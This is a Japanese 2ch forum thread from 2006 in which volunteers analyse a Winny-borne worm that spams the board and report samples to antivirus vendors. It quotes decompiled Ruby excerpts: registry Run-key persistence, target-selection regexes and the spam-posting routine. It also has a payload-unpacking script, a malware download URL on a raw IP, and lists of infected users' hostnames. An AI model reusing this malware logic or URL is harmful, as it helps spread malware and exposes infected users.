■ウィルス爆撃相談所&焼き処【RockBBQ】
レス数が950を超えています。1000を超えると書き込みができなくなります。
ここはウィルス等を利用した爆撃等の相談所です。
ウィルス感染ホストの報告と焼き処を兼ねます。
#削除依頼は、削除整理板へお願いします。
#ここでは芋掘りは行いません。専用スレでどうぞ。
【関連スレ】
【BBQ&BBM12本目】公開串登録所【ピンポイント規制】
http://qb5.2ch.net/test/read.cgi/sec2chd/1139102655/
bbs.cgi再開発プロジェクト7
http://qb5.2ch.net/test/read.cgi/operate/1130918407/ zlib使ったこと無いし
perlからzlibの使い方も知らぬ
(中にある)ファイルの日付は昨日(03/29)と今日(03/30 8:50)だった
少し追加
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip PoITQxGbsQ 6,502,611 293941e450b10a74f4c3953789ed7077
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip k7t40jJlVq 6,830,256 859c1152ae891af6e45d39facb690d27
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip TrahIRSX7w 5,921,635 aa79d0cf8c6fcd857b890ca6ac4498cc
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip kTrEVbYUbc 6,502,611 8a31ae38742cea2d46eb2bb054d3964c
(一般コミック・雑誌) [ジャンプ] [2006-18] テニスの王子様 Genius307.zip k7t40jJlVq 3,069,394 384fa751e8af899e950056e088899f05
以前にも見たような感じでファイルが・・・ >>879
これは送りましたかー?
なんせwinnyが出来ないとファイルも取得できないんですよねー。
そこがネックだったりしますー(うちのプロバイダはwinny遮断してるんでー)。 http://www.google.com/search?num=10&hl=ja&c2coff=1&q=bbs-menu-for-2ch+%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%E9%80%9F%E5%A0%B1&lr=lang_ja
で検索
<A HREF=http:\/\/([!-~]+)\.2ch\.net\/([!-~]+)\/>#{bbsname}<\/A>
にマッチしたやつを取得
['download.txt', 'tab1.txt', 'tab2.txt'].each{|x|
これは・・・
def startup filename
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key|
key.write_s('AntiDojin Extended by ', filename)
}
end
む。
↓続く コミック系・mp3・ゲームやエロゲーのNoDVDパッチとかで
毎週亜種が増えていく予感
このウイルス作者はダウソ(同人も?)に恨みでもあるのかな?
爆撃のあった板に2get禁止のアレでウイルス対策ソフト使いましょうみたいな
宣伝したほうがいいんじゃないかな
それと2chのトップにウイルス対策ソフトを使えと書く (専ブラ使ってない人向けに)
ウイルス感染者が全員2ch見てる訳ではないと思うけど何もしないよりはいいかと
焼け石に水かもしれませんが・・・ winny_thre = board.include_title(/と[^暴]{0,2}れ|ぱ.{0,2}く|ny|不正|盗|まね|真似/i)
share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)
rusu_thre = board.include_title(/ういるす|うぃるす/i)
$exename = 'c:\\:滝川クリトリスv3.exe'
$dataname = 'c:\\:滝川クリトリスv3.dat'
!!
if Time.now.to_i < 1143129600
爆撃の時間指定?
board = TwoChannel::Board.new('comic6', 'doujin')
SymantecAntiVirus 2006/03/27のやつで反応無しっと ぺたぺた
use Compress::Zlib;
$ZoneProcessfile = "e2.bin"; #(該当部分を抜き出しておくこと)
($ZoneProcesssize) = (stat($ZoneProcessfile))[7];
open INFILE,$ZoneProcessfile;
binmode(INFILE);
read(INFILE,$ZoneProcessbindata,$ZoneProcesssize);
close INFILE;
$dest = uncompress($ZoneProcessbindata);
open OFILE,">ruby.rb";
print OFILE $dest;
close
何かの流用とか言うな
まとめ
昨日から同人板へ爆撃が始まったやつっぽい アンチウィルス通報部隊へ
http://kasamatusan.sakura.ne.jp/ → なな → nana11600.zip
受信 : angel
解凍 : rovirus >>885
1143129600 = 2006/03/24(Fri) 01:00:00 JST >>884
その理屈で言うならですねー、ウイルスソフトは結構もう
普及してると思うんですー。
けど、パターンファイルに登録されない限り検出されないんですねー。
だから広がっちゃってるってのが事実だと思うんですー。
検出されるよーにするには、ウイルス本体を送って対応してもらう
必要があるわけですー。
パターンファイルの更新はー、早いところだと毎日やってますからー、
発見したら1日でも早く送るってのが次善の策だと思うんですー。 ***** 31ruby.rb
772: end
773: share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼|/i)
774: if share_thre.empty?
***** 33RUBY.RB
772: end
773: share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)
774: if share_thre.empty?
*****
***** 33ruby.rb
852: begin
853: TwoChannel::set_user_agent
854: board = TwoChannel::Board.new('comic6', 'doujin')
***** 34RUBY.RB
852: begin
853: TwoChannel::set_user_agentdownloa
854: board = TwoChannel::Board.new('comic6', 'doujin')
*****
なんというか
バグ入りで(略 同人に「ういるす」は立ってないな。いまのところ
試しに立ててみる?たぶん
>>862のロの投稿が始まると思うが
焼くことは可能になるけど、暴露されてしまうという諸刃の刃 ビンゴっぽいね
【結局】着回しを真剣に考えるスレ【金無いんだよ】
http://comic6.2ch.net/test/read.cgi/doujin/1036395101/l50
↓
【兄者】さすがだよな俺ら・同人版【弟】
http://comic6.2ch.net/test/read.cgi/doujin/1036419858/l50
/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/
この正規表現がいまいち良く分からない。見た目と違ったマッチになるけど間違った記述なのかな? ・・・・上で貼られたウイルスの感染者はID:WRuVwZkFしかいない気がする。
【兄者】さすがだよな俺ら・同人版【弟】
http://comic6.2ch.net/test/read.cgi/doujin/1036419858/l50
【ステル鞠ア】朝倉/芹野パクリ検証スレ【パクラ小麦】
http://comic6.2ch.net/test/read.cgi/doujin/1108821254/l50
ここにもID:WRuVwZkFがいるが、複数感染してる可能性がある。 >>831の続きですー(comic6も追加)
3/29 12:58:11〜3/30 17:27:15(tmp6)
〜3/30 17:28:07(comic6)
-tmp6-
221-186-221-200.ip1.george24.com 213件
p36003-adsao12honb4-acca.tokyo.ocn.ne.jp 105件
p51044-adsao12honb4-acca.tokyo.ocn.ne.jp 78件
phoenix.aitai.ne.jp 21件
softbank219062040169.bbtec.net 12件
softbank219052178096.bbtec.net 11件
dhcp-ubr1-0427.csf.ne.jp 11件
cable153064.ont.ne.jp 6件
nissin45079.ccnw.ne.jp 5件
N029029.ppp.dion.ne.jp 3件
135.169.hinocatv.ne.jp 2件
-comic6-
blackcat.reslife.okstate.edu 20件
p927305.aicint01.ap.so-net.ne.jp 15件
nissin45079.ccnw.ne.jp 3件 >>895
どーゆースレタイのスレを立てればいーか整理してー、
理由も添えて、ここに申し込んでみてくださいー。
【実験】書き込めなスレッド スレッド924について2
http://qb5.2ch.net/test/read.cgi/operate/1075184383/ >>894
ISPの共有ホスト (多数)
phoenix.aitai.ne.jp 21件
マンションの共有ホスト (数人)
221-186-221-200.ip1.george24.com 213件 def main_write board, messe #ぎりぎりか?
nanasi_name = board.settings['BBS_NONAME_NAME'] == '' ? '[名無し]さん(bin+cue).rar' : board.settings['BBS_NONAME_NAME']
name_max = board.settings['BBS_NAME_COUNT'].to_i
nanasi_name = nanasi_name[0, name_max]
targets = []
winny_thre = board.include_title(/と[^暴]{0,2}れ|ぱ.{0,2}く|ny|不正|盗|まね|真似/i)
if winny_thre.empty?
targets << board.max_res
else
targets << winny_thre.min{|a, b| a.key - b.key}
end
share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)
if share_thre.empty?
targets << board.oldest
else
targets << share_thre.min{|a, b| a.key - b.key}
end
rusu_thre = board.include_title(/ういるす|うぃるす/i)
if rusu_thre.empty?
#targets << board.first
else
targets << share_thre.min{|a, b| a.key - b.key}
end
targets.unshift(*(board.sort_old[-2, 2]))
targets.each{|x|
unless x.write(nanasi_name, '', messe.rnd)
x.board.tmp_wait
end
}
end >>894 下記以外を焼きました。
共用
> phoenix.aitai.ne.jp
> 221-186-221-200.ip1.george24.com >>898
定義の部分がないから妄想で
winny_threに(/と[^暴]{0,2}れ|ぱ.{0,2}く|ny|不正|盗|まね|真似/i)とマッチするスレを入れる。
もし、winny_threが空っぽなら
条件を満たすものの中からmax_res(dat番号が一番大きい場所?)を狙う
否なら
キーワードを満たす一番古いスレを狙う
share_threに(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)とマッチするスレを入れる。
もし、share_threが空っぽなら
一番古いスレを狙う
否なら
キーワードを満たす一番古いスレを狙う
rusu_threに(/ういるす|うぃるす/i)とマッチするスレを入れる
もし、rusu_threが空ならば
コメントアウトしてるのでなし
否ならば
条件を満たすものの中で最古のものを狙う
-----
ただ、マッチングにバグがあるみたいだからほぼ無差別に最新2スレを狙ってるみたい。 >>900
fusianaしなかった串ではないやつも焼けるんですか?
同人のほうは止まったようです。 >>885
> $exename = 'c:\\:滝川クリトリスv3.exe'
> $dataname = 'c:\\:滝川クリトリスv3.dat'
このv3ってなに?
アンラボのV3 ウイルスブロック v3antinny.exeに対抗してるの?
アンラボの販促とか? >>902 えと、ホスト分かりませんと、私達の方ではどうする事も出来ないです。。。 >905
フシアナ+アドレス帳の内容ばらまき型ウィルスはそこをターゲットにしてるよう
ですね
このタイプはまた違った種類なのかなぁ? http://www.symantec.co.jp/region/jp/avcenter/venc/data/jp-trojan.kakkeys.d.html
の亜種と思われるので、同一のウイルスの動作だと思います。
IDで他の爆撃スレを検索するとヒットするので使えるかと。
とりあえず、松元さん本人か家族のアドレスに警告メールを送信しておきました。 一応報告しといた方がええのかな。
>>887をsymantecに提出しました。
ttps://submit.symantec.com/retail/
返事が来たら追って報告します。 >>887
フリーのAVソフトウェア
AVG PSW.Generic.AGB(対応済み)
BitDefender に提出
ewido に提出
virustotalではKasperskyは対応済みだった。 nod32,avast4は未対応。 シマンテック・キングソフト・マカフィー・avast!・某の人に送りました。 >>887 トレンドマイクロさんにブツを送りましたー。 >>894の続きですー
3/30 17:27:15〜3/31 13:39:22(tmp6)
〜3/31 11:08:46(comic6)
-tmp6-
p8082-adsau12honb4-acca.tokyo.ocn.ne.jp 199件
phoenix.aitai.ne.jp 121件
144.114.168.203.megaegg.ne.jp 89件
p8081-ipad407marunouchi.tokyo.ocn.ne.jp 52件
p51044-adsao12honb4-acca.tokyo.ocn.ne.jp 36件
p7231-adsau12honb4-acca.tokyo.ocn.ne.jp 14件
p8126-ipad63marunouchi.tokyo.ocn.ne.jp 39件
softbank219052178096.bbtec.net 11件
p4169-ipbf05okidate.aomori.ocn.ne.jp 7件
i238241.ppp.asahi-net.or.jp 6件
softbank219062040169.bbtec.net 5件
210-194-24-189.rev.home.ne.jp 5件
nissin45079.ccnw.ne.jp 5件
-comic6-
d-218-40-130-174.d-cable.katch.ne.jp 103件
blackcat.reslife.okstate.edu 30件
p927305.aicint01.ap.so-net.ne.jp 14件
*一部共有ホストも含まれておりますー ipbf05okidate.aomori.ocn.ne.jp
近所でかかった馬鹿がいるのか
なむなむ
共有
phoenix.aitai.ne.jp 121件 >>914 下記以外を焼きました。
共有
phoenix.aitai.ne.jp >>917 お疲れ様ですー
>>914の続きですー
〜3/31 18:09:53(tmp6)
〜3/31 18:12:57(comic6)
-tmp6-
p8126-ipad63marunouchi.tokyo.ocn.ne.jp 30件
p8082-adsau12honb4-acca.tokyo.ocn.ne.jp 29件
d30162c0.tcat.ne.jp 25件
55.114.168.203.megaegg.ne.jp 14件
-comic6-
softbank218122194073.bbtec.net 70件 >>920
お疲れ様ですー
ありがとうございましたー >>908っす
symantecからレスポンスありました。
---
filename: (一般コミック・雑誌)[ジャンプ][2006-18]BLEACH221.zip
machine: Machine
result: See the developer notes
filename: BLEACH221.scr
machine: Machine
result: This file is detected as Trojan.Kakkeys.D. http://www.symantec.com/avcenter/venc/data/trojan.kakkeys.d.html
filename: (一般コミック・雑誌)[ジャンプ][2006-18]テニスの王子様Genius307.zip
machine: Machine
result: See the developer notes
filename: 王子307.scr
machine: Machine
result: This file is detected as Trojan.Kakkeys.D. http://www.symantec.com/avcenter/venc/data/trojan.kakkeys.d.html
filename: (一般コミック・雑誌)[ジャンプ][2006-18]BLEACH221(3).zip
machine: Machine
result: See the developer notes
filename: 鰤221 .exe
machine: Machine
result: This file is detected as Trojan.Kakkeys.D. http://www.symantec.com/avcenter/venc/data/trojan.kakkeys.d.html
---
「Trojan.Kakkeys.Dですた」らしい。。。 >>922
Norton AntiVirus LiveUpdateでも来ました。
Trojan.Kakkeys.D 03/23/06
キングソフトは解析中との返事がありました。 >918の続きです。
tmp6 03/31(金) 18:52:39 〜 03/31(金) 23:57:10
136.119.168.203.megaegg.ne.jp 203.168.119.136
14.46.87.61.ap.seikyou.ne.jp 61.87.46.14
220-213-104-245.pool.fctv.ne.jp 220.213.104.245
a0636.hyper-tsukumi.jp 210.188.114.128
d30162c0.tcat.ne.jp 211.1.98.192
dd37df534.oct-net.ne.jp 211.125.245.52
JJ034185.ppp.dion.ne.jp 211.4.34.185
OFSfa-02p3-147.ppp11.odn.ad.jp 61.209.162.147
OMCfa-01p1-238.ppp11.odn.ad.jp 61.116.143.238
p8036-adsau12honb4-acca.tokyo.ocn.ne.jp 220.97.145.36
p9197-adsao12honb4-acca.tokyo.ocn.ne.jp 219.161.140.197
comic6 03/31(金) 18:33:14 〜 03/31(金) 23:59:54
221.net059085201.t-com.ne.jp 59.85.201.221
KHP059140192247.ppp-bb.dion.ne.jp 59.140.192.247
p3024-ipbf10akatuka.ibaraki.ocn.ne.jp 60.39.176.24
softbank221039230023.bbtec.net 221.39.230.23
softbank221076082017.bbtec.net 221.76.82.17
>>925の続きですー
〜3/32 14:00:08(tmp6)
〜3/32 14:59:20(comic6)
-tmp6-
59-190-117-92.eonet.ne.jp 154件
softbank221092000083.bbtec.net 34件
OMCfa-01p1-238.ppp11.odn.ad.jp 10件
136.119.168.203.megaegg.ne.jp 9件
p8036-adsau12honb4-acca.tokyo.ocn.ne.jp 7件
softbank218116216024.bbtec.net 2件
14.46.87.61.ap.seikyou.ne.jp 4件
a0636.hyper-tsukumi.jp 2件
-comic6-
softbank220003040058.bbtec.net 72件
TTN202-127-81-29.ttn.ne.jp 70件
p3024-ipbf10akatuka.ibaraki.ocn.ne.jp 8件
softbank221039230023.bbtec.net 6件
221.net059085201.t-com.ne.jp 4件
softbank219012020092.bbtec.net 6件
softbank221089108029.bbtec.net 2件
KHP059140192247.ppp-bb.dion.ne.jp 2件
softbank221076082017.bbtec.net 1件 軍艦焼★さんが提出していましたが念のため提出しましたー
#あともう一つ別のベンダに転送したいのですが本日オフラインのようで。 >>932
お疲れ様ですー ありがとうございましたー
>>933
お疲れ様ですー >>929のTTN202-127-81-29.ttn.ne.jpですが、ケーブルの共有プライベートアドレスなので
もし可能でしたら解除して頂けませんでしょうか…… TTN202-127-81-29.ttn.ne.jpから2chへばっこんばっこんアクセスしている、
ウイルス感染者を始末して証拠を提示すればOK >>937
ケーブル会社に連絡してそのアドレスで2chに連続書き込みしてる人を
処置してもらったほうが早いんじゃないの?
えーと、感染のチェックってみんなどうやってるんだろー?
どんどん撒かれてる亜種についてはー、最新のソフト一つ
程度じゃ検出されないと思うんですけどー。 >>937-939 とりあえず共有の可能性ありなので解除してみました。
#また焼かれても私は無責任で。
>>887 ただいま解析中と中の人からお手紙ありましたー。 >>940
http://hp.vector.co.jp/authors/VA032928/
このソフト入れて通信を監視していれば、意図しない2ちゃんねるへのアクセスに気づくことは可能。 >>941
どうもありがとうございました。お手数掛けて申し訳ありません。
>>938-939
会社の方にも報告しておきます。お目汚し失礼しました。 >>942
をー。結構面白いソフトあるんですねー。
けど、気づいたあとはどうなんでしょうねー。
どこのディレクトリにどういうファイルを作るかとかー、
亜種毎にそんなに違わないなら整理できないですかねー。
>>922の解説にある「C:\[JAPANESE CHARACTERS].exe」
って、具体的にはどんなファイルが作られるんだろー?
>3. Winny プロセスが動作中である場合、これは Winny がインストールされているフォルダ内で次のファイルを検索し、その後そのファイルのコンテンツを C:\[日本語の文字].dat へ保存します。
>
> Tab1.txt
> Tab2.txt
> download.txt
この機能ってー、絞り込みを回避するために感染パソコン
同士で書き込みワードをシャッフルする機能みたいですねー。
これによってターゲットもどんどん変えられるんじゃないかなー。
本体を感染させなくてもー。 そこで報告されてたのは送付されたのかな?
ひっかからないけど削除したって書いてあるけど。 >>896の申請がされてるようですが
お狐様は見てくださるんですかねー? >>945
>って、具体的にはどんなファイルが作られるんだろー?
>885 にある >>951
ちょっと心配になってきたんですがー、1000まで埋まったあとに
各ウィルスはどういう動きしてましたっけー?
書き込めなかったら次にいっちゃうんじゃないかなー?
もしかしたら、傘にならないよーな気もしてきましたー(汗)。 >>953
埋まってしまうと次へいくけど、
ちょっと前に、スレ本体が埋まってSubject.txtが999って状態のスレがあったんです。
その時は999のスレがdat落ちするまで爆撃は止まってました。
>>953
2get禁止スレはdat番号が一桁少ないので、特定ワードを含んだスレを古い順に爆撃タイプのウィルスの受け皿になれるかも
(申請されているスレタイは爆撃されるように工夫)
なんで上手くいけば、ウィルスの受け皿andウィルスが書き込みしようとする度に上がってくれてウマー
受け皿になれずとも、良い宣伝にはなれるのではないかと
以上より申請させて頂きましたが、誰も見てくれてない予感 >>955
書き込まれるのが問題なんじゃなくて、バコバコ突っつかれるのが問題だから
924スレだと根本的な問題を隠しちゃうからダメなんじゃないかな。 >2get禁止スレはdat番号が一桁少ないので
ソースきぼんぬ
9240000001 >>956
同心板でのウィルスは、最新と古いスレを狙うので2get禁止スレだけじゃ全部は防げません
ダウソ板の方はもはやDos攻撃になってるとは聞いたけれど、同人はそこまで激しくないかと
どっちにしろ鯖には優しくないことは確定ですが
>>957
私も教えてもらった人なのでソースは知りません
9240000001でも最新スレ爆撃タイプの標的になれるので問題ないです
(2get禁止スレに書き込みを試みた際のウィルスの挙動が分からないかので、言い切れませんが) ウイルスの対応
スレッドキーの先等が9だったら対象からはずす ダウソにまた新種が出ているかもー
フシアナageでいろんなスレにいろんな(VIPっぽい)メッセージを書込みます。
電話番号らしきものも何件か書き込まれています。
特定のスレに集中はしていないし、連投している訳でも無さそうです。
ウィルスの仕業なのかどうかは判明していませんが、とりあえず一報 >>958
正確には
1桁少ないではない
このスレは
1140878994
なんだけど 924 スレは
9240000001 とかになってる (符号無し timeでは符号有りなんでマイナス) ==============================
2006/02/23〜
【通称】 AntiDojin
==============================
【被害板】 同人板@cimic6
【特徴】
・「著作権守れ」「こんな所でバカやってる暇があったら働け」「自首しろ」等
のフレーズに、スペース・カンマ・ピリオドを混ぜた長文を書き込み
・名前欄に板デフォルト名等を都度入力
・亜種あり(スレタイ対策やデフォ名変更に対応して頻繁に発生)
・ゾヌ2用私設板一覧から同人板のURLを採取
【経緯】
2006/02/23 爆撃開始
2006/02/25 klistからのBBQ焼き開始
2006/02/27 Symantec・トレンドマイクロ等に検体提出、順次検出可能に
2006/02/28 AntiLoチェッカー・有志の駆除ツールが対応
2006/02/28 板一覧取得先が、板名表記変更・UAで拒否
2006/03/01〜沈静化。亜種にも順次対応
【ウイルスの実体確認状況】 Winny2(一般コミック・雑誌) [ジャンプ] など
【アンチウイルス検出状況】
AVG 718 02.27.2006 : PSW.Generic.AGB
DrWeb 4.33 02.27.2006 : Trojan.PWS.Ruby
Ikarus 0.2.59.0 02.27.2006 : Trojan.Win32.Agent.EZ
Kaspersky 4.0.2.24 02.28.2006 : Trojan-Spy.Ruby.Kakkeys.h
Symantec 8.0 02.28.2006 : Trojan.Kakkeys
UNA 1.83 02.27.2006 : Trojan.Spy.Win32.Kakkeys
VBA32 3.10.5 02.27.2006 : Trojan-Spy.Ruby.Kakkeys.h
Trend Micro(バスター) : TROJ_KAKKEYS.I〜K
【参考スレ】
運用・規制系
http://qb5.2ch.net/test/read.cgi/operate/1130918407/455-475 (bbs.cgi)
http://qb5.2ch.net/test/read.cgi/sec2chd/1139102655/548-561 (BBQ)
http://qb5.2ch.net/test/read.cgi/sec2chd/1140878994/1-508 (>1-508)
現地系
http://qb5.2ch.net/test/read.cgi/sec2chd/1140849989/322-326(以下のまとめ)
http://comic6.2ch.net/test/read.cgi/doujin/1140918937/ (自治スレ4)
http://comic6.2ch.net/test/read.cgi/doujin/1140974901/ (自治スレ5)
http://comic6.2ch.net/test/read.cgi/doujin/1141063674/ (自治スレ6)
http://comic6.2ch.net/test/read.cgi/doujin/1141361573/1-320 (自治スレ7)
http://comic6.2ch.net/test/read.cgi/doujin/1140863905/ (情報集積所)
============================== ==============================
2006/03/08〜
【通称】 小泉ウイルス
==============================
【被害板】 Download@tmp6
【特徴】
・スレタイに「ny」を含む一番上のスレに、
下記のパターンの定型文を書き込み(海外からは文字化け)
[マーダー系] 英雄伝説Y 空の軌跡SC まだぁ〜? ピザ まだぁ〜? 等
[偏見系] 日本人のすべては無知な人間です 等
[ヲチスレ系] 良スレ(´・ω・)ス ウィル(´・ω・)ス 等
[勧告系] 馬鹿は放置しる 等
[宣言系] 利用する 便利じゃん 等
[顔文字] キタワァ*・゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。..。.:*・゜゚・* ミ ☆
[嗜好系] 幼女とやりたい今日この頃 等
[犯罪予告] 明日、小泉(以下略)
【経緯】
2006/03/08 爆撃開始
2006/03/11 klistからのBBQ焼き開始
【ウイルスの実体確認状況】
[060309][一般ゲーム][Falcom] 英雄伝説Y 〜空の軌跡SC〜
三国志11 NOCDパッチ
FF12 HDL起動可パッチ
英雄 SCのセーブデータ 等
【アンチウイルス検出状況】 ?
【参考スレ】
運用・規制系
http://qb5.2ch.net/test/read.cgi/sec2chd/1140878994/511-811 (>511-811)
現地系
http://aa5.2ch.net/test/read.cgi/nanmin/1142776192/1-297 (対策室)
============================== ==============================
2006/03/30〜
【通称】 ?(Winny検索文字列暴露)
==============================
【被害板】 doujin@comic6
【特徴】
・Winnyインストールフォルダ内のTab1.txt・Tab2.txt・download.txtの内容を
書き込み(爆撃先はバグのため不定?)
・fusianasan+アドレスタイプは無い模様
・爆撃精度を上げたバグ修正版亜種(新タイプ)が発生?
・04/02時点での爆撃先パターン
1.最新2スレ(新スレが立てば移動) <<旧タイプ・新タイプ>>
2.タイトルマッチしたスレを古い順に爆撃 <<新タイプ>>share
(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)
3.タイトルマッチしたスレを古い順に爆撃 <<新タイプ>>Winny
(/と[^暴]{0,2}れ|ぱ.{0,2}く|ny|不正|盗|まね|真似/i)
4.最古スレを(ほぼ)無差別爆撃 <<旧タイプ>>
【経緯】
2006/03/30 爆撃開始
2006/03/30 実体発見・検体提出 (>879-911)
2006/03/30 klistからのBBQ焼き開始
【ウイルスの実体確認状況】
(一般コミック・雑誌) [ジャンプ]
http://qb5.2ch.net/test/read.cgi/sec2chd/1140878994/879 (>879)
http://qb5.2ch.net/test/read.cgi/sec2chd/1140878994/881 (>881)
http://qb5.2ch.net/test/read.cgi/sec2chd/1140878994/887 (>887)
【アンチウイルス検出状況】
symantec(Norton) : ◎Trojan.Kakkeys.D
Trend Micro(バスター) : △(3/30検体提出>911、解析中>941)
McAfee : △(3/30検体提出>910、対応待ち)
キングソフト : △(3/30検体提出>910、解析中>923)
Eset(NOD32) : ×
Grisoft(AVG) : ◎PSW.Generic.AGB
ALWIL(Avast) : △(3/30検体提出>910、対応待ち)
BitDefender : △(3/30検体提出>909、対応待ち)
ewido networks : △(3/30検体提出>909、対応待ち)
【参考スレ】
運用・規制系
http://qb5.2ch.net/test/read.cgi/operate/1140600013/695-700 (動作報告)
http://qb5.2ch.net/test/read.cgi/sec2chd/1140878994/879- (>879-)
現地系
http://comic6.2ch.net/test/read.cgi/doujin/1141361573/338- (自治スレ7)
==============================
※>>●と言語が違うという話もあるので、一応別立て このスレに出てきた物をまとめようとしたけど、力尽きました。
特に、亜種情報が埋まっていそうなDownload内のスレッドが追いきれませぬ。
亜種別に細かく補足すれば、飛行石氏ご提案のブツでしょうけど。。。_。
追いやすくするには、やはり現地の方々のご協力が不可欠だと思います。
特に、微妙な変化で亜種の気配を感じるには、現場に居ないと難しいです。
同人板は、情報が自治スレにうまくまとまっていると思います。
Download板は分散してしまっているので、例えば傘スレでヲチってる方に、
ウイルスの挙動の変化や、実体の情報(未確認も可)を、ここに報告して頂くとか。
対策室スレ等に、傘とそれ以外の爆撃スレ一覧があるだけでも、助かるかも。
そしたら、実体捜索→発見→鑑定→検体提出の流れが作りやすいかと。 >>968
お疲れ様でした
なんかちょっと感動しましたよ >>968
ActivePerlとHTTPDが必要だけど
キーワード探索ツール
http://briefcase.yahoo.co.jp/bc/midnightsun_366/lst?.dir=/68fd&.src=bc&.view=
キーワードを含むスレをDAT番号でソートして表示します。キーワードは把握し切れてないので、外れるかもしれませんが。(大きめに取ってある)
--------------
腐海ウイルス(仮)の攻撃
攻撃ワードは大きくまとめてWinny系、Share系、算用数字4桁系があります。
レス内容で分類すると、age系とsage系があります。
★確定したワード★
・算用数字4桁系
age・sage両方来る。
・Share系上げ
「hare」
・Share系下げ
「share」
・Winny系上げ
「inny」
・Winny系下げ
「winny」
★ほぼ確定ワード
Winny系(上げ下げ両方)・・・うぃに
例:【うぃにー】 時代劇すれ 拾四 【 ('A`) 】
http://tmp6.2ch.net/test/read.cgi/download/1143178465/l50
★まだ確認してないが怪しいワード
Share系・・・しぇあ、シェア
Winny系・・・ウィニ
★今のところ無視することを確認したもの(今後対応する可能性もあるが)
「洒落」「ny」「re」「しゃれ」 訂正:
Winny系上げ
【Winn y】エロアニメ専用 第82ハッシュ【マターリ】
http://tmp6.2ch.net/test/read.cgi/download/1143323895/l50
例外がありました。
Winn yも攻撃したので、/W.*I.*N.*N.*Y/i かもしれません。 以前自サイトにウイルスUPしていた ◆eYKXFMdxpwに対して2chは何かアクション起こした?
本当かわからないけど在住地を品川区と明記しているから
本人を特定することも可能だと思うんだけど ttp://219.41.136.152/C:/Program%20Files/update/update.exe
これを踏んでしまいましたorz
キンタマと言われたのですが初心者な者で全くわからなくてこまってます。
誰か症状と消去方法を教えてください。
本当に心配です… マカフィーは調査中
> お問い合わせありがとうございます。
> マカフィー株式会社のAVERTです。
>
> お送りいただいたファイルですが、弊社でもKakkeysに似ている点は確認できているのですが、
> いくつかの理由により、現段階ではトロイの木馬とは断定できておりません。
>
> 引き続き調査の上、必要があれば正式DATに反映させます。
フレーヾ(゚ー゚ゞ)( 尸ー゚)尸_フレー >>977
それは山田オルタ。ここを参考にしたらいい
ttp://www.geocities.jp/dkstr_hamar/alter/alter.html レス数が950を超えています。1000を超えると書き込みができなくなります。
